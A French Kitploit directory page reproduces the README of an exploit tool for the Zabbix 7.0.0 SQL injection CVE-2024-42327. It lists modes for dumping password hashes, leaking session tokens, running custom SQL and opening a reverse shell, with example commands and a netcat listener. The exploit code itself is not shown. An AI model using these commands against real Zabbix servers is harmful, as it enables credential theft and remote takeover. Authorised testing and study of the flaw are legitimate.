Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-42327_Zabbix_SQLi — Ceci est à des fins éducatives uniquement. Veuillez ne pas l'utiliser contre des systèmes non autorisés. | Kitploit
Outils/GitHubGitHub/874anthony/cve-2024-42327_zabbix_sqli
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHub874anthony/cve-2024-42327_zabbix_sqli

CVE-2024-42327_Zabbix_SQLi

Ceci est à des fins éducatives uniquement. Veuillez ne pas l'utiliser contre des systèmes non autorisés.

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🛡️ Script d'Exploitation d'Injection SQL Zabbix 7.0.0

Un script Python pour exploiter une vulnérabilité d'injection SQL authentifiée sur Zabbix 7.0.0, prenant en charge plusieurs modes d'action incluant l'extraction de données utilisateur, la fuite de jetons de session, l'exécution de commandes à distance (RCE) et l'injection de requêtes personnalisées.

⚠️ AVERTISSEMENT :
Ce script est destiné uniquement à des fins éducatives et de tests d'intrusion autorisés.
Ne l'utilisez pas sur des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite.
L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par cet outil.


✨ Fonctionnalités

  • ✅ Injection SQL authentifiée contre Zabbix 7.0.0
  • 🧑‍💻 Extraction des hachages utilisateur de la base de données
  • 🔐 Fuite de jetons de session
  • 🐚 Exécution de code à distance via un shell inversé (jeton admin requis)
  • 🧠 Exécution de requêtes SQL personnalisées

🔧 Prérequis

  • Python 3.6+
  • Bibliothèque requests

Installez les dépendances si nécessaire :

root@kitploit:~
pip install requests

🚀 Utilisation

root@kitploit:~
python3 sqliZabbix.py -u <ZABBIX_URL> -U <USERNAME> -p <PASSWORD> --mode <MODE> [optional args...]

🔘 Modes disponibles

ModeDescriptionNécessite un jeton admin
leak-usersExtrait tous les IDs utilisateur, noms d'utilisateur, hachages de mots de passe et rôles❌
leak-tokensExtrait tous les IDs de session actifs de la base de données❌
rceLance un shell inversé via l'exploitation de item.create✅
customExécute toute requête SQL personnalisée via l'injection❌

🧪 Exemples

Extraction des hachages utilisateur

root@kitploit:~
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-users

Fuite de jetons de session

root@kitploit:~
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-tokens

Exécution de code à distance (Shell inversé)

root@kitploit:~
# Lancez d'abord un écouteur :
nc -lvnp 9001

# Exécutez ensuite :
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --admin_token <ADMIN_API_TOKEN> --ip <YOUR_IP> --port 9001 --mode rce

Injection SQL personnalisée

root@kitploit:~
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode custom --query "SELECT version()"

📁 Structure du projet

root@kitploit:~
sqliZabbix.py      # Script d'exploitation principal
README.md          # Cette documentation

🧑‍💻 Auteur

Anthony (@874anthony)

Conçu avec amour et curiosité 🐍

🔐 Licence

Ce projet est publié sous la licence MIT. Veuillez l'utiliser de manière responsable.

Télécharger l’outil